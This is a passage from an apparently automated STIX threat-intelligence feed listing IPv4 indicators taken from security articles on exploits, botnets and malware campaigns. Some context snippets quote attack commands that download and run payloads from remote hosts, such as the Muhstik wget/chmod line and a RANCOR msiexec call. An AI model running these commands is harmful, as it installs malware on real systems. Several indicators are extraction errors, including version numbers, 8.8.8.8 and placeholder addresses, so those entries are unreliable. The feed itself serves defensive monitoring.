News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1123bd49-8164-4468-95c4-b363ca85b62c","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 167.254.240.75","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 185.196.220.85 103.84.230.85 103.90.148.202 216.126.225.208 167.254.240.75 167.254.241.119 114.10.17.253 114.10.45.151 2406:ef80:2:7d1","pattern":"[ipv4-addr:value = '167.254.240.75']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--de98fdae-6136-428a-9bf0-905c4a0cd639","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 167.254.241.119","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 103.84.230.85 103.90.148.202 216.126.225.208 167.254.240.75 167.254.241.119 114.10.17.253 114.10.45.151 2406:ef80:2:7d19::1 WordPress s","pattern":"[ipv4-addr:value = '167.254.241.119']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--81f4c2cc-32aa-4285-a256-a8f854989572","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 182.10.130.51","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 03.168.147.235 103.168.146.131 103.154.152.178 103.170.97.7 182.10.130.51 189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122","pattern":"[ipv4-addr:value = '182.10.130.51']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--12735dcd-0626-4a59-b78f-a4b4914ef53f","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 185.196.220.85","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: riginated from the below IP addresses - 2602:fa59:10:7a1::1 185.196.220.85 103.84.230.85 103.90.148.202 216.126.225.208 167.254.240.75","pattern":"[ipv4-addr:value = '185.196.220.85']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--19c13e67-7a3a-4f8f-b1e2-dcec6988e65a","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 189.4.122.140","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 103.168.146.131 103.154.152.178 103.170.97.7 182.10.130.51 189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122 37.9.33.62 Th","pattern":"[ipv4-addr:value = '189.4.122.140']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ea0e1a81-7ce8-4a3b-a1a2-7118fb4f2d3e","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 216.126.225.208","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: :fa59:10:7a1::1 185.196.220.85 103.84.230.85 103.90.148.202 216.126.225.208 167.254.240.75 167.254.241.119 114.10.17.253 114.10.45.151","pattern":"[ipv4-addr:value = '216.126.225.208']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--72a0f4dd-08d5-405d-8f94-778af7094a70","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 37.9.33.62","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122 37.9.33.62 The malicious activity is said to have begun on July 14, 20","pattern":"[ipv4-addr:value = '37.9.33.62']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--489fb5a1-9c40-4e85-a122-55b8d08ab6b7","created":"2026-09-04T08:48:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 64.176.209.104","description":"Seen in \"Over 440,000 Exploit Attempts Target Super Forms and Elementor Pro RCE Flaws\" (The Hacker News). Context: 178 103.170.97.7 182.10.130.51 189.4.122.140 129.227.46.143 64.176.209.104 103.164.182.122 37.9.33.62 The malicious activity is said t","pattern":"[ipv4-addr:value = '64.176.209.104']","pattern_type":"stix","valid_from":"2026-09-04T08:48:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/over-440000-exploit-attempts-target.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d136572b-cbc5-4dcd-a3b9-473e68ed9228","created":"2026-09-03T02:07:30.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 162.55.0.0","description":"Seen in \"Security Incident – BGP Hijacking\" (Lobsters · security). Context: an Hetzner’s normal announcement of the surrounding block ( 162.55.0.0/16 ), so under standard BGP route selection it took precede","pattern":"[ipv4-addr:value = '162.55.0.0']","pattern_type":"stix","valid_from":"2026-09-03T02:07:30.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"Lobsters · security","url":"https://www.virtualizor.com/blog/security-incident-bgp-hijacking/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--557b2201-e3bb-45f0-8d60-464084ede696","created":"2026-09-03T02:07:30.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 162.55.80.0","description":"Seen in \"Security Incident – BGP Hijacking\" (Lobsters · security). Context: TC , a block of IP addresses used by Softaculous services ( 162.55.80.0/24 , part of our infrastructure at Hetzner) was affected by","pattern":"[ipv4-addr:value = '162.55.80.0']","pattern_type":"stix","valid_from":"2026-09-03T02:07:30.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"Lobsters · security","url":"https://www.virtualizor.com/blog/security-incident-bgp-hijacking/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7bcb35a3-1669-4451-91e4-048c55530b14","created":"2026-09-02T13:12:45.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 3.2.9.9","description":"Seen in \"BGP Hijack Delivers Malicious Virtualizor Update That Establishes Persistent Root Access\" (The Hacker News). Context: anches. The incident advisory names the release Virtualizor 3.2.9.9 , while the release note calls it Virtualizor 3.2.9 (Releas","pattern":"[ipv4-addr:value = '3.2.9.9']","pattern_type":"stix","valid_from":"2026-09-02T13:12:45.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/bgp-hijack-delivers-malicious.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--75ddff42-5f9a-4d58-ab76-948ad625de6f","created":"2026-09-02T00:00:00.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 176.65.148.184","description":"Seen in \"Exploitation of Sangoma Switchvox flaw is underway (CVE-2026-9586)\" (Help Net Security). Context: include specific log entries and the attackers’ IP address (176.65.148.184). “Given the quick succession of exploit attempts across mu","pattern":"[ipv4-addr:value = '176.65.148.184']","pattern_type":"stix","valid_from":"2026-09-02T00:00:00.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/02/exploitation-of-sangoma-switchvox-flaw-underway-cve-2026-9586/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--aa736560-cbc3-4f58-9b16-8753f964167e","created":"2026-09-01T21:30:18.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 185.254.222.105","description":"Seen in \"Guildma (Astaroth) malware infection from Brazilian Portuguese email, (Tue, Sep 1st)\" (SANS Internet Storm Center). Context: ceived: from relatorio01a.colombstracciatella.cfd (unknown [185.254.222.105]) [information removed] ; Wed, 26 Aug 2026 22:01:41 +0000 (","pattern":"[ipv4-addr:value = '185.254.222.105']","pattern_type":"stix","valid_from":"2026-09-01T21:30:18.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33300"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0573f106-2504-4b2a-95a4-7660fc748a9d","created":"2026-09-01T15:32:54.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 176.65.148.184","description":"Seen in \"CVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability\" (Horizon3.ai). Context: pts originating from: Indicator Type Description IP Address 176.65.148.184 was observed targeting the vulnerable Switchvox /pa endpoin","pattern":"[ipv4-addr:value = '176.65.148.184']","pattern_type":"stix","valid_from":"2026-09-01T15:32:54.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Horizon3.ai","url":"https://horizon3.ai/attack-research/vulnerabilities/cve-2026-9586/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--aaaea2b5-35a5-405a-b3c7-4586d82ecf13","created":"2026-09-01T15:32:54.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 8.2.2.1","description":"Seen in \"CVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability\" (Horizon3.ai). Context: release notes describe CVE-2026-9586 as affecting Switchvox 8.2.2.1, while the CNA record specifies 8.3 (104997). Organizations","pattern":"[ipv4-addr:value = '8.2.2.1']","pattern_type":"stix","valid_from":"2026-09-01T15:32:54.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Horizon3.ai","url":"https://horizon3.ai/attack-research/vulnerabilities/cve-2026-9586/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2c7b44f6-31ae-4fd5-b25b-ca8c83f37e99","created":"2026-09-01T15:32:54.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 8.4.0.2","description":"Seen in \"CVE-2026-9586 | Sangoma Switchvox Unauthenticated SQL Injection Remote Code Execution Vulnerability\" (Horizon3.ai). Context: goma Switchvox SMB Edition 8.3 (104997), versions less than 8.4.0.2 The available public sources contain some inconsistency reg","pattern":"[ipv4-addr:value = '8.4.0.2']","pattern_type":"stix","valid_from":"2026-09-01T15:32:54.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Horizon3.ai","url":"https://horizon3.ai/attack-research/vulnerabilities/cve-2026-9586/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--356002c9-2ed9-4cfc-96c8-29cdb0543031","created":"2026-08-19T12:06:09.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 132.223.202.213","description":"Seen in \"Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices\" (Palo Alto Unit 42). Context: like Gecko ) Chrome / 51.0.2704.103 Safari / 537.36 Host : 132.223.202.213 Scan #3: CVE-2019-2725 - WebLogic versions 10.3.6.0 and 12.","pattern":"[ipv4-addr:value = '132.223.202.213']","pattern_type":"stix","valid_from":"2026-08-19T12:06:09.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c668d397-9afc-45d6-bbd0-d55cbbdf1442","created":"2026-08-19T12:06:09.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 159.89.156.190","description":"Seen in \"Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices\" (Palo Alto Unit 42). Context: DE . 1 2 3 4 5 6 7 8 9 10 11 wget - O / tmp / pty1 http : //159.89.156.190/.y/pty1; chmod +x / tmp / pty1 ; chmod 700 / tmp / pty1 ; /","pattern":"[ipv4-addr:value = '159.89.156.190']","pattern_type":"stix","valid_from":"2026-08-19T12:06:09.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--991c2d93-7577-4597-bf6b-5f5902943b6c","created":"2026-08-19T12:06:09.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 165.227.78.159","description":"Seen in \"Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices\" (Palo Alto Unit 42). Context: > < / void > < void index = '2' > < string > wget http : //165.227.78.159/wl.php</string> </void> </array> <void method = 'start' / >","pattern":"[ipv4-addr:value = '165.227.78.159']","pattern_type":"stix","valid_from":"2026-08-19T12:06:09.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bddfcd21-4783-4a2d-8677-37b99ab4541d","created":"2026-08-19T12:06:09.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 194.187.209.4","description":"Seen in \"Muhstik Botnet Attacks Tomato Routers to Harvest New IoT Devices\" (Palo Alto Unit 42). Context: like Gecko ) Chrome / 51.0.2704.103 Safari / 537.36 Host : 194.187.209.4 Content - Type : text / xml content - length : 916 < soapen","pattern":"[ipv4-addr:value = '194.187.209.4']","pattern_type":"stix","valid_from":"2026-08-19T12:06:09.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--68cc661a-cc96-4570-b939-277e8bd5be43","created":"2026-08-17T13:24:28.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 199.247.6.253","description":"Seen in \"RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families\" (Palo Alto Unit 42). Context: ct ( ^ \"Wscript.Shell^\" ) : v . Run ^ \"msiexec /q /i http://199.247.6.253/ud^\" , false , 0 < nul > C : \\ Windows \\ System32 \\ spool \\","pattern":"[ipv4-addr:value = '199.247.6.253']","pattern_type":"stix","valid_from":"2026-08-17T13:24:28.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cf163b99-be86-44b8-abc0-f791cc82ef27","created":"2026-08-17T13:24:28.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 89.46.222.97","description":"Seen in \"RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families\" (Palo Alto Unit 42). Context: 90fe195a2ef109d855 Loader C2 facebook-apps.com (resolves to 89.46.222.97) c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca47","pattern":"[ipv4-addr:value = '89.46.222.97']","pattern_type":"stix","valid_from":"2026-08-17T13:24:28.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d58a8efa-3125-4a0a-8a51-7e6a04c3cd0f","created":"2026-08-17T13:19:12.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 119.104.111.97","description":"Seen in \"xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection\" (Palo Alto Unit 42). Context: C2 server answers these two queries with the IPv4 addresses 119.104.111.97 and 109.105.0.0 , which CASHY200 processes by treating each","pattern":"[ipv4-addr:value = '119.104.111.97']","pattern_type":"stix","valid_from":"2026-08-17T13:19:12.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/more-xhunt-new-powershell-backdoor-blocked-through-dns-tunnel-detection/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8c093133-5c87-498f-b970-dc8f2c76e41e","created":"2026-08-17T13:19:12.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 1.2.3.4","description":"Seen in \"xHunt Campaign: New PowerShell Backdoor Blocked Through DNS Tunnel Detection\" (Palo Alto Unit 42). Context: ure 4 shows the DNS server responding to these queries with 1.2.3.4 , which is just a placeholder we included in our C2 server","pattern":"[ipv4-addr:value = '1.2.3.4']","pattern_type":"stix","valid_from":"2026-08-17T13:19:12.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/more-xhunt-new-powershell-backdoor-blocked-through-dns-tunnel-detection/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b0cbfa0b-8dfb-428f-91d6-20b362c6964f","created":"2026-08-17T12:57:39.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 46.166.165.254","description":"Seen in \"New Malware 'Rover' Targets Indian Ambassador to Afghanistan\" (Palo Alto Unit 42). Context: nloader which is used to call out to a server with the IP ' 46.166.165.254 ' and download the main Rover malware along with plugins us","pattern":"[ipv4-addr:value = '46.166.165.254']","pattern_type":"stix","valid_from":"2026-08-17T12:57:39.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/new-malware-rover-targets-indian-ambassador-to-afghanistan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e0a68f0e-1912-4fce-83fe-baa422937de8","created":"2026-08-17T12:20:00.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 111.111.111.111","description":"Seen in \"Threat Brief: Ongoing Russia and Ukraine Cyber Activity\" (Palo Alto Unit 42). Context: ping.exe\" ) and action_process_image_command_line contains \"111.111.111.111 -n 5 -w 10\" | fields _time , agent_hostname , actor_effecti","pattern":"[ipv4-addr:value = '111.111.111.111']","pattern_type":"stix","valid_from":"2026-08-17T12:20:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4084bd2d-d07e-4dda-bdf6-679d31d9416f","created":"2026-08-17T12:19:27.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 172.104.31.117","description":"Seen in \"Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022\" (Palo Alto Unit 42). Context: iginated from the following IP addresses: IoC Type IoC Ipv4 172.104.31.117 Ipv4 191.37.248.120 Ipv4 84.17.48.94 Ipv4 193.106.191.71 Ip","pattern":"[ipv4-addr:value = '172.104.31.117']","pattern_type":"stix","valid_from":"2026-08-17T12:19:27.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/cve-2022-26134-atlassian-code-execution-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1f6858b8-4eed-416f-ae11-9789572db306","created":"2026-08-17T12:19:27.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 191.37.248.120","description":"Seen in \"Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022\" (Palo Alto Unit 42). Context: llowing IP addresses: IoC Type IoC Ipv4 172.104.31.117 Ipv4 191.37.248.120 Ipv4 84.17.48.94 Ipv4 193.106.191.71 Ipv4 18.216.140.250 Ip","pattern":"[ipv4-addr:value = '191.37.248.120']","pattern_type":"stix","valid_from":"2026-08-17T12:19:27.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/cve-2022-26134-atlassian-code-execution-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c6e147f8-0a8d-4101-8cd7-a5f9804581bd","created":"2026-08-17T12:19:27.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 84.17.48.94","description":"Seen in \"Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022\" (Palo Alto Unit 42). Context: : IoC Type IoC Ipv4 172.104.31.117 Ipv4 191.37.248.120 Ipv4 84.17.48.94 Ipv4 193.106.191.71 Ipv4 18.216.140.250 Ipv4 18.221.234.103","pattern":"[ipv4-addr:value = '84.17.48.94']","pattern_type":"stix","valid_from":"2026-08-17T12:19:27.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/cve-2022-26134-atlassian-code-execution-vulnerability/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e8d3045e-abf5-465a-92d4-c6b901b53e86","created":"2026-08-17T11:18:17.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 1.2.3.4","description":"Seen in \"Hacking Public Wi-Fi DNS to Steal Credentials\" (Schneier on Security). Context: -browswer. DNS lookup is redirected and goes to a the wrong 1.2.3.4 ip address. As long as that IP address has a security cert,","pattern":"[ipv4-addr:value = '1.2.3.4']","pattern_type":"stix","valid_from":"2026-08-17T11:18:17.000Z","labels":["auto-extracted","research"],"confidence":30,"external_references":[{"source_name":"Schneier on Security","url":"https://www.schneier.com/blog/archives/2026/08/hacking-public-wi-fi-dns-to-steal-credentials.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d2af1185-1aff-4986-8188-6a8b977985f9","created":"2026-08-17T11:18:17.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 8.8.8.8","description":"Seen in \"Hacking Public Wi-Fi DNS to Steal Credentials\" (Schneier on Security). Context: in LA, what should I do – edit my android hosts file to use 8.8.8.8 to get DNS? Aim my browser at the IP address of my hosting","pattern":"[ipv4-addr:value = '8.8.8.8']","pattern_type":"stix","valid_from":"2026-08-17T11:18:17.000Z","labels":["auto-extracted","research"],"confidence":30,"external_references":[{"source_name":"Schneier on Security","url":"https://www.schneier.com/blog/archives/2026/08/hacking-public-wi-fi-dns-to-steal-credentials.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fc50e571-f76b-42fc-8143-19852010fff9","created":"2026-08-17T09:53:55.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 185.159.130.89","description":"Seen in \"\"Blank Slate\" Campaign Takes Advantage of Hosting Providers to Spread Ransomware\" (Palo Alto Unit 42). Context: 6.173 guntergoner[.]top - 35.163.101.72 guntergoner[.]top - 185.159.130.89 ibm-technoligi[.]top - 35.165.251.24 ibm-technoligi[.]top -","pattern":"[ipv4-addr:value = '185.159.130.89']","pattern_type":"stix","valid_from":"2026-08-17T09:53:55.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-blank-slate-campaign-takes-advantage-hosting-providers-spread-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ef852c05-d52e-44c0-9db8-ccea83fa3a6e","created":"2026-08-17T09:53:55.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 35.163.101.72","description":"Seen in \"\"Blank Slate\" Campaign Takes Advantage of Hosting Providers to Spread Ransomware\" (Palo Alto Unit 42). Context: 219.161 footarepu[.]top - 35.165.86.173 guntergoner[.]top - 35.163.101.72 guntergoner[.]top - 185.159.130.89 ibm-technoligi[.]top - 3","pattern":"[ipv4-addr:value = '35.163.101.72']","pattern_type":"stix","valid_from":"2026-08-17T09:53:55.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-blank-slate-campaign-takes-advantage-hosting-providers-spread-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6dbf935b-d062-454c-8483-4809392ecee6","created":"2026-08-17T09:53:55.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 35.165.251.24","description":"Seen in \"\"Blank Slate\" Campaign Takes Advantage of Hosting Providers to Spread Ransomware\" (Palo Alto Unit 42). Context: 2 guntergoner[.]top - 185.159.130.89 ibm-technoligi[.]top - 35.165.251.24 ibm-technoligi[.]top - 62.109.29.26 polkiuj[.]top - 35.165.","pattern":"[ipv4-addr:value = '35.165.251.24']","pattern_type":"stix","valid_from":"2026-08-17T09:53:55.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-blank-slate-campaign-takes-advantage-hosting-providers-spread-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c6b219c0-2797-4ee9-8e1e-bdabff431f00","created":"2026-08-17T09:53:55.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 35.165.251.241","description":"Seen in \"\"Blank Slate\" Campaign Takes Advantage of Hosting Providers to Spread Ransomware\" (Palo Alto Unit 42). Context: .251.24 ibm-technoligi[.]top - 62.109.29.26 polkiuj[.]top - 35.165.251.241 polkiuj[.]top - 46.173.219.161 suzemodels[.]top - 35.163.10","pattern":"[ipv4-addr:value = 